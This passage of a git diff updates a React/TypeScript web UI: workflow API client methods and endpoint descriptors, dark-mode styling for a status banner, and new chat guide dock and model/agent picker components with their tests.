   cancelExecution: (workflowId: string, execId: string) =>
     client.post<{ status: string; message: string; executionId: string }>(
@@ -394,7 +445,7 @@ export const workflowAPI = {
     client.get<WorkflowJSON>(`/api/workflow/${id}/export`),
 
   publish: (id: string, data?: { driver?: WorkflowServiceDriver }) =>
-    client.post<WorkflowService>(`/api/workflow/${id}/publish`, data, { timeout: 300000 }),
+    client.post<WorkflowService>(`/api/workflow/${id}/publish`, data, { timeout: 600000 }),
 
   unpublish: (id: string) =>
     client.post<{ ok: boolean }>(`/api/workflow/${id}/unpublish`),
@@ -402,6 +453,18 @@ export const workflowAPI = {
   getService: (id: string) =>
     client.get<WorkflowService | null>(`/api/workflow/${id}/service`),
 
+  deleteService: (id: string) =>
+    client.delete<{ ok: boolean; workflowId: string }>(`/api/workflow/${id}/service`),
+
+  getConfig: (id: string) =>
+    client.get<WorkflowIntegrationConfigResponse>(`/api/workflow/${id}/config`),
+
+  updateConfig: (id: string, config: WorkflowIntegrationConfig) =>
+    client.put<WorkflowIntegrationConfigResponse>(`/api/workflow/${id}/config`, config),
+
+  syncConfig: (id: string) =>
+    client.post<WorkflowIntegrationConfigResponse>(`/api/workflow/${id}/config/sync`),
+
   listServices: () =>
     client.get<WorkflowService[]>('/api/workflow-services'),
 
@@ -508,3 +571,43 @@ export const workflowAPI = {
   saveSampleInputs: (id: string, sampleInputs: Record<string, any>) =>
     client.post<{ ok: boolean }>(`/api/workflow/${id}/sample-inputs`, { sampleInputs }),
 };
+
+/** Returns endpoint descriptor strings (mostly "METHOD path") for one workflow. */
+export function workflowAPIEndpoints(id: string, triggerId = '{triggerId}') {
+  const root = `/api/workflow/${id}`;
+  const triggers = `${root}/triggers`;
+  const trigger = `${triggers}/${triggerId}`;
+  return {
+    config: {
+      read: `GET ${root}/config`,
+      write: `PUT ${root}/config`,
+      syncFallback: `POST ${root}/config/sync`,
+    },
+    apiService: {
+      read: `GET ${root}/service`,
+      publish: `POST ${root}/publish`,
+      unpublish: `POST ${root}/unpublish`,
+      delete: `DELETE ${root}/service`,
+    },
+    triggers: {
+      list: `GET ${triggers}`,
+      create: `POST ${triggers}`,
+      update: `PUT ${trigger}`,
+      delete: `DELETE ${trigger}`,
+      status: `GET ${trigger}/status`,
+      previewMapping: `POST ${trigger}/preview-mapping`,
+      test: `POST ${trigger}/test`,
+      invokeWebhook: `/webhook/workflows/${id}/${triggerId}`,
+      plugins: 'GET /api/workflow-trigger-plugins',
+    },
+    legacyAdapters: {
+      kafkaConfig: `GET/POST ${root}/kafka-config`,
+      kafkaStatus: `GET ${root}/kafka-status`,
+      pollerConfig: `GET/POST ${root}/poller-config`,
+      pollerStatus: `GET ${root}/poller-status`,
+      pollerRunOnce: `POST ${root}/poller-run-once`,
+      syslogConfig: `GET/POST ${root}/syslog-config`,
+      syslogStatus: `GET ${root}/syslog-status`,
+    },
+  };
+}
diff --git a/webui/src/components/common/BackendStatusBanner.tsx b/webui/src/components/common/BackendStatusBanner.tsx
index cd93ed47f..9da1d55b2 100644
--- a/webui/src/components/common/BackendStatusBanner.tsx
+++ b/webui/src/components/common/BackendStatusBanner.tsx
@@ -13,13 +13,13 @@ export function BackendStatusBanner() {
   const getBannerStyle = () => {
     switch (status) {
       case 'connecting':
-        return 'bg-yellow-50 border-yellow-200 text-yellow-800';
+        return 'bg-yellow-50 border-yellow-200 text-yellow-800 dark:border-amber-500/35 dark:bg-amber-500/15 dark:text-amber-100';
       case 'disconnected':
-        return 'bg-red-50 border-red-200 text-red-800';
+        return 'bg-red-50 border-red-200 text-red-800 dark:border-red-400/30 dark:bg-red-500/15 dark:text-red-100';
       case 'error':
-        return 'bg-red-50 border-red-200 text-red-800';
+        return 'bg-red-50 border-red-200 text-red-800 dark:border-red-400/30 dark:bg-red-500/15 dark:text-red-100';
       default:
-        return 'bg-gray-50 border-gray-200 text-gray-800';
+        return 'bg-gray-50 border-gray-200 text-gray-800 dark:border-[#4a5563] dark:bg-[#303842] dark:text-[#d7dee8]';
     }
   };
 
@@ -72,7 +72,7 @@ export function BackendStatusBanner() {
           
           <button
             onClick={checkHealth}
-            className="px-4 py-2 bg-white/50 hover:bg-white/80 rounded-lg text-sm font-medium transition-colors duration-200 flex items-center space-x-2"
+            className="px-4 py-2 bg-white/50 hover:bg-white/80 rounded-lg text-sm font-medium transition-colors duration-200 flex items-center space-x-2 dark:bg-[#46515e]/70 dark:hover:bg-[#5a6573]"
           >
             <RefreshCw className="w-4 h-4" />
             <span>{t('backend.retry')}</span>
diff --git a/webui/src/components/common/ChatGuideDock.test.tsx b/webui/src/components/common/ChatGuideDock.test.tsx
new file mode 100644
index 000000000..2976ff0e4
--- /dev/null
+++ b/webui/src/components/common/ChatGuideDock.test.tsx
@@ -0,0 +1,89 @@
+import { render, screen } from '@testing-library/react';
+import userEvent from '@testing-library/user-event';
+import { describe, expect, it, vi } from 'vitest';
+
+import ChatGuideDock, { type ChatGuideAction } from './ChatGuideDock';
+
+const actions: ChatGuideAction[] = Array.from({ length: 6 }, (_item, index) => ({
+  label: `Guide ${index + 1}`,
+  description: `Description ${index + 1}`,
+  prompt: `Prompt ${index + 1}`,
+  group: index < 3 ? 'Create Guides' : 'Create Cases',
+}));
+
+describe('ChatGuideDock', () => {
+  it('keeps guides in a compact rail and expands upward to a full guide panel', async () => {
+    const user = userEvent.setup();
+    const onStartPrompt = vi.fn();
+
+    render(
+      <ChatGuideDock
+        actions={actions}
+        collapseTitle="Collapse guide"
+        expandTitle="Expand guide"
+        onStartPrompt={onStartPrompt}
+      />,
+    );
+
+    expect(screen.getByRole('button', { name: 'Guide 1' })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: 'Guide 5' })).toBeInTheDocument();
+    expect(screen.queryByRole('button', { name: 'Guide 6' })).not.toBeInTheDocument();
+    expect(screen.queryByTestId('chat-guide-expanded-panel')).not.toBeInTheDocument();
+
+    const expandButton = screen.getByRole('button', { name: /Expand guide/ });
+    expect(expandButton).toHaveAttribute('aria-expanded', 'false');
+
+    await user.click(expandButton);
+
+    expect(screen.getByTestId('chat-guide-expanded-panel')).toBeInTheDocument();
+    expect(screen.getByText('Create Guides')).toBeInTheDocument();
+    expect(screen.getByText('Create Cases')).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: 'Guide 6' }).parentElement?.parentElement).toHaveClass(
+      'grid-cols-[repeat(auto-fill,minmax(140px,1fr))]',
+    );
+    expect(screen.getByRole('button', { name: 'Guide 6' })).toBeInTheDocument();
+    expect(expandButton).toHaveAttribute('aria-expanded', 'true');
+
+    await user.click(screen.getByRole('button', { name: 'Guide 6' }));
+
+    expect(onStartPrompt).toHaveBeenCalledWith('Prompt 6', 'Guide 6');
+  });
+
+  it('keeps a left-side collapse control for the guide rail', async () => {
+    const user = userEvent.setup();
+
+    render(
+      <ChatGuideDock
+        actions={actions}
+        collapseTitle="Collapse guide"
+        expandTitle="Expand guide"
+        onStartPrompt={vi.fn()}
+      />,
+    );
+
+    await user.click(screen.getByRole('button', { name: 'Collapse guide' }));
+
+    expect(screen.queryByRole('button', { name: 'Guide 1' })).not.toBeInTheDocument();
+    expect(screen.getByRole('button', { name: 'Expand guide' })).toHaveAttribute('aria-expanded', 'false');
+  });
+
+  it('closes the expanded panel when clicking outside the guide dock', async () => {
+    const user = userEvent.setup();
+
+    render(
+      <ChatGuideDock
+        actions={actions}
+        collapseTitle="Collapse guide"
+        expandTitle="Expand guide"
+        onStartPrompt={vi.fn()}
+      />,
+    );
+
+    await user.click(screen.getByRole('button', { name: /Expand guide/ }));
+    expect(screen.getByTestId('chat-guide-expanded-panel')).toBeInTheDocument();
+
+    await user.click(document.body);
+
+    expect(screen.queryByTestId('chat-guide-expanded-panel')).not.toBeInTheDocument();
+  });
+});
diff --git a/webui/src/components/common/ChatGuideDock.tsx b/webui/src/components/common/ChatGuideDock.tsx
new file mode 100644
index 000000000..9c73816af
--- /dev/null
+++ b/webui/src/components/common/ChatGuideDock.tsx
@@ -0,0 +1,172 @@
+import { useEffect, useRef, useState } from 'react';
+import { ChevronUp, ChevronsLeft, ChevronsRight } from 'lucide-react';
+import GuideInfoIcon from './GuideInfoIcon';
+
+export interface ChatGuideAction {
+  label: string;
+  description: string;
+  prompt: string;
+  group?: string;
+}
+
+interface ChatGuideDockProps {
+  actions: ChatGuideAction[];
+  disabled?: boolean;
+  collapseTitle: string;
+  expandTitle: string;
+  onStartPrompt: (prompt: string, label: string) => void;
+}
+
+const RAIL_ACTION_LIMIT = 5;
+
+/**
+ * Buckets actions by trimmed `group` ('' when absent), keeping first-seen order.
+ */
+function groupGuideActions(actions: ChatGuideAction[]) {
+  const byTitle = new Map<string, { title: string; actions: ChatGuideAction[] }>();
+
+  actions.forEach((action) => {
+    const title = action.group?.trim() || '';
+    const bucket = byTitle.get(title) ?? { title, actions: [] };
+    // Re-setting an existing key keeps its original position in the Map.
+    byTitle.set(title, bucket);
+    bucket.actions.push(action);
+  });
+  return Array.from(byTitle.values());
+}
+
+/**
+ * Guide shortcut dock: a collapsible rail showing the first RAIL_ACTION_LIMIT
+ * actions and, when more exist, a toggle for a grouped panel of every action.
+ */
+export default function ChatGuideDock({
+  actions,
+  disabled,
+  collapseTitle,
+  expandTitle,
+  onStartPrompt,
+}: ChatGuideDockProps) {
+  const rootRef = useRef<HTMLDivElement>(null);
+  const [collapsed, setCollapsed] = useState(false);
+  const [panelOpen, setPanelOpen] = useState(false);
+
+  const hasOverflowActions = actions.length > RAIL_ACTION_LIMIT;
+  const railActions = actions.slice(0, RAIL_ACTION_LIMIT);
+  const actionGroups = groupGuideActions(actions);
+  const shouldShowGroupTitle = actionGroups.some((group) => group.title);
+
+  const handleStartPrompt = (action: ChatGuideAction) => {
+    setPanelOpen(false);
+    onStartPrompt(action.prompt, action.label);
+  };
+
+  useEffect(() => {
+    if (!panelOpen || collapsed) return undefined;
+
+    const handlePointerDown = (event: PointerEvent) => {
+      const target = event.target;
+      if (!(target instanceof Node) || rootRef.current?.contains(target)) return;
+      setPanelOpen(false);
+    };
+
+    document.addEventListener('pointerdown', handlePointerDown);
+    return () => document.removeEventListener('pointerdown', handlePointerDown);
+  }, [collapsed, panelOpen]);
+
+  if (actions.length === 0) return null;
+
+  const renderActionButton = (action: ChatGuideAction, variant: 'rail' | 'panel') => (
+    <div
+      key={action.label}
+      className={`group inline-flex h-8 max-w-full items-center rounded-lg border border-zinc-200 bg-white text-zinc-700 transition-colors hover:border-rose-200 hover:bg-rose-50/70 hover:text-rose-600 ${
+        variant === 'rail' ? 'flex-shrink-0' : 'min-w-0'
+      }`}
+    >
+      <button
+        type="button"
+        disabled={disabled}
+        onClick={() => handleStartPrompt(action)}
+        className="flex h-full min-w-0 flex-1 items-center truncate whitespace-nowrap rounded-l-lg pl-2.5 pr-1 text-left text-xs font-semibold leading-none disabled:cursor-not-allowed disabled:opacity-50"
+      >
+        {action.label}
+      </button>
+      <GuideInfoIcon label={action.label} description={action.description} />
+    </div>
+  );
+
+  return (
+    <div ref={rootRef} className="relative flex w-full min-w-0 items-stretch gap-1.5">
+      {panelOpen && !collapsed && (
+        <div
+          data-testid="chat-guide-expanded-panel"
+          className="absolute bottom-full left-0 right-0 z-30 mb-2 h-56 max-h-[calc(100vh-12rem)] overflow-hidden rounded-xl border border-zinc-200 bg-white/95 p-2 shadow-lg backdrop-blur"
+        >
+          <div className="flex h-full flex-col gap-3 overflow-y-auto pr-1 [scrollbar-width:thin] [scrollbar-color:#d4d4d8_transparent] dark:[scrollbar-color:#545d68_transparent]">
+            {actionGroups.map((group, groupIndex) => (
+              <section key={group.title || `group-${groupIndex}`} className="min-w-0">
+                {shouldShowGroupTitle && group.title && (
+                  <div className="mb-1.5 px-1 text-[11px] font-semibold leading-none text-zinc-400">
+                    {group.title}
+                  </div>
+                )}
+                <div className="grid grid-cols-[repeat(auto-fill,minmax(140px,1fr))] gap-1.5">
+                  {group.actions.map((action) => renderActionButton(action, 'panel'))}
+                </div>
+              </section>
+            ))}
+          </div>
+        </div>
+      )}
+
+      <button
+        type="button"
+        onClick={() => {
+          // State updaters must stay pure, so the panel is dismissed here in the
+          // handler rather than inside the setCollapsed updater. The panel can
+          // only be open while the rail is expanded, so this is a no-op otherwise.
+          setPanelOpen(false);
+          setCollapsed((value) => !value);
+        }}
+        className="flex h-8 w-8 flex-shrink-0 items-center justify-center rounded-lg border border-zinc-200 bg-white text-zinc-400 transition-colors hover:border-rose-200 hover:bg-rose-50/70 hover:text-rose-500"
+        title={collapsed ? expandTitle : collapseTitle}
+        aria-label={collapsed ? expandTitle : collapseTitle}
+        aria-expanded={!collapsed}
+      >
+        {collapsed ? <ChevronsRight className="h-3.5 w-3.5" /> : <ChevronsLeft className="h-3.5 w-3.5" />}
+      </button>
+
+      <div
+        className={`min-w-0 flex-1 overflow-x-auto overflow-y-hidden pr-1 transition-all duration-200 [scrollbar-width:none] [&::-webkit-scrollbar]:hidden ${
+          collapsed ? 'basis-0 max-w-0 opacity-0 pointer-events-none' : 'basis-auto max-w-full opacity-100'
+        }`}
+        onWheel={(event) => {
+          const delta = Math.abs(event.deltaX) > Math.abs(event.deltaY) ? event.deltaX : event.deltaY;
+          if (delta === 0) return;
+          event.currentTarget.scrollLeft += delta;
+          event.preventDefault(); // NOTE(review): has no effect if React registers this wheel listener as passive — confirm
+        }}
+      >
+        <div className="flex w-max gap-1.5">
+          {!collapsed && railActions.map((action) => renderActionButton(action, 'rail'))}
+        </div>
+      </div>
+
+      {hasOverflowActions && !collapsed && (
+        <button
+          type="button"
+          onClick={() => setPanelOpen((value) => !value)}
+          className={`inline-flex h-8 w-8 flex-shrink-0 items-center justify-center rounded-lg border bg-white transition-colors ${
+            panelOpen
+              ? 'border-rose-200 text-rose-500'
+              : 'border-zinc-200 text-zinc-400 hover:border-rose-200 hover:bg-rose-50/70 hover:text-rose-500'
+          }`}
+          title={panelOpen ? collapseTitle : expandTitle}
+          aria-label={panelOpen ? collapseTitle : expandTitle}
+          aria-expanded={panelOpen}
+        >
+          <ChevronUp className={`h-3.5 w-3.5 transition-transform ${panelOpen ? 'rotate-180' : ''}`} />
+        </button>
+      )}
+    </div>
+  );
+}
diff --git a/webui/src/components/common/ChatPromptSelectors.test.tsx b/webui/src/components/common/ChatPromptSelectors.test.tsx
new file mode 100644
index 000000000..147ad560c
--- /dev/null
+++ b/webui/src/components/common/ChatPromptSelectors.test.tsx
@@ -0,0 +1,64 @@
+import { render, screen } from '@testing-library/react';
+import userEvent from '@testing-library/user-event';
+import { describe, expect, it, vi } from 'vitest';
+
+import { ChatModelPicker, type ChatModelProviderGroup } from './ChatPromptSelectors';
+
+vi.mock('react-i18next', () => ({
+  useTranslation: () => ({
+    t: (key: string, params?: Record<string, unknown>) => {
+      const translations: Record<string, string> = {
+        'modelPicker.title': '选择模型',
+        'modelPicker.hint': '作为本次对话发送时的模型覆盖',
+        'modelPicker.empty': '暂无模型',
+        'modelPicker.count': `${params?.count ?? 0}`,
+        'modelPicker.vision': '视觉',
+        loading: '加载中',
+      };
+      return translations[key] ?? key;
+    },
+  }),
+}));
+
+const groupedOptions: ChatModelProviderGroup[] = [
+  {
+    providerID: 'minimax',
+    providerName: 'Minimax',
+    models: [
+      {
+        key: 'minimax::minimax-m3',
+        providerID: 'minimax',
+        providerName: 'Minimax',
+        modelID: 'minimax-m3',
+        label: 'minimax-m3',
+        pricingLabel: 'free',
+        contextLabel: '128k',
+        contextWindowTokens: 128000,
+        supportsVision: false,
+      },
+    ],
+  },
+];
+
+describe('ChatModelPicker', () => {
+  it('opens the model menu toward the left edge of the trigger', async () => {
+    const user = userEvent.setup();
+
+    render(
+      <ChatModelPicker
+        groupedOptions={groupedOptions}
+        loading={false}
+        selectedModelOption={groupedOptions[0].models[0]}
+        onSelectModel={vi.fn()}
+      />,
+    );
+
+    await user.click(screen.getByRole('button', { name: /minimax-m3/i }));
+
+    const menu = screen.getByText('选择模型').closest('.absolute');
+    expect(menu).not.toBeNull();
+    expect(menu).toHaveClass('right-0');
+    expect(menu).toHaveClass('bottom-full');
+    expect(menu).not.toHaveClass('left-0');
+  });
+});
diff --git a/webui/src/components/common/ChatPromptSelectors.tsx b/webui/src/components/common/ChatPromptSelectors.tsx
new file mode 100644
index 000000000..bcf576204
--- /dev/null
+++ b/webui/src/components/common/ChatPromptSelectors.tsx
@@ -0,0 +1,543 @@
+import { useCallback, useEffect, useMemo, useState } from 'react';
+import { Bot, ChevronDown, Cpu, Info } from 'lucide-react';
+import { useTranslation } from 'react-i18next';
+
+import type { Agent } from '@/api/agent';
+import { defaultModelAPI, modelV2API } from '@/api/provider';
+import { useAgents } from '@/hooks/useAgents';
+import { useProviders } from '@/hooks/useProviders';
+import { getAgentDisplayDescription, getAgentDisplayName, isAgentUsableInChat } from '@/utils/agentDisplay';
+import type { ModelDefinitionV2 } from '@/types';
+
+export type AgentSourceFilter = 'all' | 'builtin' | 'custom'; // Agent list filter: 'builtin' keeps native agents, 'custom' keeps non-native ones, 'all' keeps both.
+
+export type ChatModelOption = { // One selectable model, pre-formatted for the model picker. Field notes describe how useChatModelOptions fills them.
+  key: string; // `${providerID}::${modelID}`; compared against the selected model key.
+  providerID: string;
+  providerName: string; // Provider name, falling back to the provider id.
+  modelID: string;
+  label: string; // Model name, falling back to the model id.
+  pricingLabel: string; // Translated pricing text; shown as a tooltip line.
+  contextLabel: string; // Translated context-window text; shown as a tooltip line.
+  contextWindowTokens: number | null; // null when the definition carries no context window.
+  supportsVision: boolean | null; // null when the capability is not reported as a boolean.
+};
+
+export type ChatModelProviderGroup = { // Models of one provider, rendered as a section of the model picker.
+  providerID: string;
+  providerName: string; // Shown as the section header.
+  models: ChatModelOption[];
+};
+
+type SelectorTooltip = { // Content and anchor point of the hover tooltip drawn by SelectorTooltipOverlay.
+  title: string;
+  lines: string[]; // Body lines rendered below the title, one element per line.
+  x: number; // Applied as CSS `left` of the fixed-position overlay.
+  y: number; // Applied as CSS `top` of the fixed-position overlay.
+};
+
+function formatAgentName(name: string): string { // Upper-cases the first character; an empty name is returned unchanged.
+  return !name ? name : `${name.charAt(0).toUpperCase()}${name.slice(1)}`;
+}
+
+/**
+ * Lists the agents selectable in chat: usable primary agents first, then the
+ * remaining usable agents, optionally restricted to `allowedAgentNames`.
+ * The `loading` flag is forwarded from `useAgents`.
+ */
+export function useChatAgentOptions(options: { allowedAgentNames?: string[] } = {}) {
+  const { allowedAgentNames } = options;
+  const { agents, loading } = useAgents();
+
+  const allowedNames = useMemo(
+    () => (allowedAgentNames ? new Set(allowedAgentNames) : null),
+    [allowedAgentNames],
+  );
+
+  const chatAgents = useMemo(() => {
+    const usable = agents.filter((agent) => isAgentUsableInChat(agent));
+    const isPrimary = (agent: Agent) => agent.mode === 'primary';
+    // Primary agents go ahead of every other mode; order inside each group is kept.
+    const ordered = [...usable.filter(isPrimary), ...usable.filter((agent) => !isPrimary(agent))];
+    return allowedNames ? ordered.filter((agent) => allowedNames.has(agent.name)) : ordered;
+  }, [agents, allowedNames]);
+
+  return { agents: chatAgents, loading };
+}
+
+export function useChatModelOptions() { // Hook: builds the selectable model list from enabled model definitions and configured providers, and tracks the selected model.
+  const { t } = useTranslation('session');
+  const { providers, loading: loadingProviders } = useProviders();
+  const [enabledModelDefinitions, setEnabledModelDefinitions] = useState<ModelDefinitionV2[]>([]);
+  const [loadingEnabledModels, setLoadingEnabledModels] = useState(true);
+  const [selectedModelKey, setSelectedModelKey] = useState<string | null>(null); // `${providerID}::${modelID}`, or null while nothing has been selected.
+
+  useEffect(() => { // Runs once on mount: load the enabled model definitions.
+    let cancelled = false; // Flipped by the cleanup so a late response does not touch state.
+    setLoadingEnabledModels(true);
+    Promise.resolve(modelV2API.listDefinitions({ enabled_only: true }))
+      .then((response) => {
+        if (!cancelled) setEnabledModelDefinitions(response?.data?.models ?? []);
+      })
+      .catch(() => {
+        if (!cancelled) setEnabledModelDefinitions([]); // A failed request is treated as "no models"; the error is not surfaced.
+      })
+      .finally(() => {
+        if (!cancelled) setLoadingEnabledModels(false);
+      });
+    return () => {
+      cancelled = true;
+    };
+  }, []);
+
+  const options = useMemo<ChatModelOption[]>(() => { // Flat option list; models whose provider is not configured are dropped.
+    const providerById = new Map(
+      providers
+        .filter((provider) => provider.configured)
+        .map((provider) => [provider.id, provider]),
+    );
+
+    const formatPricing = (pricing: ModelDefinitionV2['pricing']): string => {
+      if (!pricing) return t('modelPicker.noCost');
+      if (pricing.input === 0 && pricing.output === 0) return t('modelPicker.free');
+      const currencySymbol = pricing.currency === 'CNY' ? '¥' : '$'; // Any currency other than CNY is shown with '$'.
+      return `${currencySymbol}${pricing.input}/${currencySymbol}${pricing.output}/M`;
+    };
+
+    const formatContextWindow = (contextWindow?: number): string => {
+      if (!contextWindow) return t('modelPicker.contextUnknown'); // Missing or 0.
+      const value = contextWindow >= 1000000 // Rounded to a whole number of M or K.
+        ? `${(contextWindow / 1000000).toFixed(0)}M`
+        : `${(contextWindow / 1000).toFixed(0)}K`;
+      return t('modelPicker.contextWindow', { value });
+    };
+
+    return enabledModelDefinitions.flatMap((model) => {
+      const provider = providerById.get(model.provider_id);
+      if (!provider) return []; // flatMap drops the model when its provider is unknown or unconfigured.
+      return [{
+        key: `${provider.id}::${model.id}`,
+        providerID: provider.id,
+        providerName: provider.name || provider.id,
+        modelID: model.id,
+        label: model.name || model.id,
+        pricingLabel: formatPricing(model.pricing),
+        contextLabel: formatContextWindow(model.limits?.context_window),
+        contextWindowTokens: model.limits?.context_window ?? null,
+        supportsVision: typeof model.capabilities?.supports_vision === 'boolean'
+          ? model.capabilities.supports_vision
+          : null,
+      }];
+    });
+  }, [enabledModelDefinitions, providers, t]);
+
+  const groupedOptions = useMemo<ChatModelProviderGroup[]>(() => { // Options bucketed per configured provider, for sectioned rendering.
+    const groups = new Map<string, ChatModelProviderGroup>();
+
+    providers.forEach((provider) => {
+      if (!provider.configured) return;
+      groups.set(provider.id, {
+        providerID: provider.id,
+        providerName: provider.name || provider.id,
+        models: [],
+      });
+    });
+
+    options.forEach((option) => {
+      const group = groups.get(option.providerID);
+      if (group) group.models.push(option);
+    });
+
+    return Array.from(groups.values()) // Models sorted by label, empty groups removed, groups sorted by provider name.
+      .map((group) => ({
+        ...group,
+        models: [...group.models].sort((a, b) => a.label.localeCompare(b.label)),
+      }))
+      .filter((group) => group.models.length > 0)
+      .sort((a, b) => a.providerName.localeCompare(b.providerName));
+  }, [options, providers]);
+
+  const selectedModelOption = useMemo( // Option for the selected key, else the first option, else null.
+    () => options.find((option) => option.key === selectedModelKey) ?? options[0] ?? null,
+    [options, selectedModelKey],
+  );
+
+  useEffect(() => { // While nothing is selected and options exist, adopt the resolved default model.
+    if (selectedModelKey || options.length === 0) return;
+    let cancelled = false;
+    Promise.resolve(defaultModelAPI.getResolved())
+      .then((response) => {
+        if (cancelled) return;
+        const { provider_id: providerID, model_id: modelID } = response?.data ?? {};
+        const defaultKey = `${providerID}::${modelID}`;
+        const fallbackKey = options[0]?.key ?? null;
+        setSelectedModelKey(options.some((option) => option.key === defaultKey) ? defaultKey : fallbackKey); // The default is used only when it is among the options.
+      })
+      .catch(() => {
+        if (!cancelled) setSelectedModelKey(options[0]?.key ?? null); // On failure fall back to the first option.
+      });
+    return () => {
+      cancelled = true;
+    };
+  }, [options, selectedModelKey]);
+
+  useEffect(() => { // After loading, replace a selection that is no longer among the options with the first option.
+    if (loadingEnabledModels || options.length === 0 || !selectedModelKey) return;
+    if (options.some((option) => option.key === selectedModelKey)) return;
+    setSelectedModelKey(options[0].key);
+  }, [loadingEnabledModels, options, selectedModelKey]);
+
+  return {
+    groupedOptions,
+    loading: loadingProviders || loadingEnabledModels,
+    options,
+    selectedModelKey,
+    selectedModelOption,
+    selectedPromptModel: selectedModelOption // { providerID, modelID } of the effective selection, or null when there is none.
+      ? { providerID: selectedModelOption.providerID, modelID: selectedModelOption.modelID }
+      : null,
+    setSelectedModelKey,
+  };
+}
+
+/**
+ * State holder for the hover tooltip used by the pickers in this file.
+ *
+ * `showTooltip(target, title, lines)` stores the text together with a point
+ * 8px to the left of the target's bounding rect and level with its vertical
+ * centre; `hideTooltip()` resets the state to null. Both callbacks keep a
+ * stable identity across renders.
+ */
+function useSelectorTooltip() {
+  const [tooltip, setTooltip] = useState<SelectorTooltip | null>(null);
+
+  const showTooltip = useCallback((target: HTMLElement, title: string, lines: string[]) => {
+    const { left, top, height } = target.getBoundingClientRect();
+    setTooltip({ title, lines, x: left - 8, y: top + height / 2 });
+  }, []);
+  const hideTooltip = useCallback(() => setTooltip(null), []);
+
+  return { tooltip, showTooltip, hideTooltip };
+}
+
+function SelectorTooltipOverlay({ tooltip }: { tooltip: SelectorTooltip | null }) { // Draws the tooltip as a fixed-position box at (tooltip.x, tooltip.y); the CSS translate classes shift it left of and vertically centred on that point.
+  if (!tooltip) return null; // Nothing is rendered while no tooltip is active.
+  return (
+    <div
+      className="pointer-events-none fixed z-[80] w-56 -translate-x-full -translate-y-1/2 rounded-lg border border-zinc-200 bg-white px-3 py-2 text-[11px] leading-relaxed text-zinc-700 shadow-md dark:border-zinc-800 dark:bg-zinc-900 dark:text-zinc-300 dark:shadow-xl dark:shadow-black/30"
+      style={{ left: tooltip.x, top: tooltip.y }}
+    >
+      <div className="mb-0.5 font-semibold text-zinc-800 dark:text-zinc-100">{tooltip.title}</div>
+      {tooltip.lines.map((line, index) => (
+        <div key={`${tooltip.title}-${index}`} className={index === 0 ? '' : 'mt-1 break-all text-zinc-500 dark:text-zinc-400'}>
+          {line}
+        </div>
+      ))}
+      <div className="absolute left-full top-1/2 -translate-y-1/2 border-4 border-transparent border-l-zinc-200 dark:border-l-zinc-800" />
+    </div>
+  );
+}
+
+export function ChatAgentDisplay({ // Read-only label showing the currently selected agent (no dropdown).
+  agents,
+  selectedAgent,
+}: {
+  agents: Agent[];
+  selectedAgent: string;
+}) {
+  const { t, i18n } = useTranslation('session');
+  const selectedAgentInfo = useMemo( // Agent record matching the selected name; undefined when it is not in the list.
+    () => agents.find((agent) => agent.name === selectedAgent),
+    [agents, selectedAgent],
+  );
+
+  return (
+    <div
+      className="flex h-7 w-auto max-w-[150px] min-w-0 items-center gap-1.5 rounded-lg px-2 text-xs text-zinc-600 dark:text-zinc-300"
+      title={t('agentPicker.title')}
+    >
+      <Bot className="h-3 w-3 shrink-0" />
+      <span className="truncate font-medium">
+        {selectedAgentInfo ? getAgentDisplayName(selectedAgentInfo, i18n.language) : formatAgentName(selectedAgent)}
+      </span>
+    </div>
+  );
+}
+
+// Dropdown for picking the chat agent. Every button declares type="button" so a click can never submit an enclosing form.
+export function ChatAgentPicker({
+  agents,
+  loading,
+  selectedAgent,
+  onSelectAgent,
+  showSourceFilter = true,
+}: {
+  agents: Agent[];
+  loading: boolean;
+  selectedAgent: string;
+  onSelectAgent: (agentName: string) => void;
+  showSourceFilter?: boolean;
+}) {
+  const { t, i18n } = useTranslation('session');
+  const [open, setOpen] = useState(false);
+  const [sourceFilter, setSourceFilter] = useState<AgentSourceFilter>('all');
+  const { tooltip, showTooltip, hideTooltip } = useSelectorTooltip();
+
+  const filteredAgents = useMemo( // The source filter applies only while its toggle is shown.
+    () => agents.filter((agent) => {
+      if (!showSourceFilter) return true;
+      if (sourceFilter === 'builtin') return agent.native;
+      if (sourceFilter === 'custom') return !agent.native;
+      return true;
+    }),
+    [agents, showSourceFilter, sourceFilter],
+  );
+  const selectedAgentInfo = useMemo( // Undefined when the selected name is not in `agents`; the trigger then shows the capitalised raw name.
+    () => agents.find((agent) => agent.name === selectedAgent),
+    [agents, selectedAgent],
+  );
+
+  useEffect(() => { // While open, close the menu on any mousedown outside this picker.
+    if (!open) return;
+    const handle = (event: MouseEvent) => {
+      const target = event.target as HTMLElement;
+      if (!target.closest('[data-agent-selector]')) setOpen(false);
+    };
+    document.addEventListener('mousedown', handle);
+    return () => document.removeEventListener('mousedown', handle);
+  }, [open]);
+
+  useEffect(() => { // A tooltip must not outlive the menu it belongs to.
+    if (!open) hideTooltip();
+  }, [hideTooltip, open]);
+
+  return (
+    <div className="relative" data-agent-selector>
+      <button
+        type="button"
+        onClick={() => setOpen((value) => !value)}
+        className="flex h-7 w-auto max-w-[150px] min-w-0 items-center gap-1.5 rounded-lg px-2 text-xs text-zinc-600 transition-colors hover:bg-zinc-200/60 hover:text-zinc-900 dark:text-zinc-300 dark:hover:bg-zinc-800 dark:hover:text-zinc-50"
+        title={t('agentPicker.title')}
+      >
+        <Bot className="h-3 w-3 shrink-0" />
+        <span className="truncate font-medium">
+          {selectedAgentInfo ? getAgentDisplayName(selectedAgentInfo, i18n.language) : formatAgentName(selectedAgent)}
+        </span>
+        <ChevronDown className={`h-3 w-3 shrink-0 transition-transform ${open ? 'rotate-180' : ''}`} />
+      </button>
+      {open && (
+        <div className="absolute left-0 bottom-full z-50 mb-2 w-80 max-w-[calc(100vw-2rem)] rounded-lg border border-zinc-200 bg-white shadow-sm dark:border-zinc-800 dark:bg-zinc-900 dark:shadow-xl dark:shadow-black/30">
+          <div className="flex items-center justify-between gap-2 border-b border-zinc-100 px-2.5 py-1.5 dark:border-zinc-800">
+            <div className="min-w-0">
+              <div className="text-xs font-semibold text-zinc-700 dark:text-zinc-100">{t('agentPicker.title')}</div>
+              <div
+                className="truncate text-[10px] text-zinc-400 dark:text-zinc-500"
+                onPointerEnter={(event) => showTooltip(event.currentTarget, t('agentPicker.title'), [t('agentPicker.hint')])}
+                onMouseEnter={(event) => showTooltip(event.currentTarget, t('agentPicker.title'), [t('agentPicker.hint')])}
+                onMouseOver={(event) => showTooltip(event.currentTarget, t('agentPicker.title'), [t('agentPicker.hint')])}
+                onMouseLeave={hideTooltip}
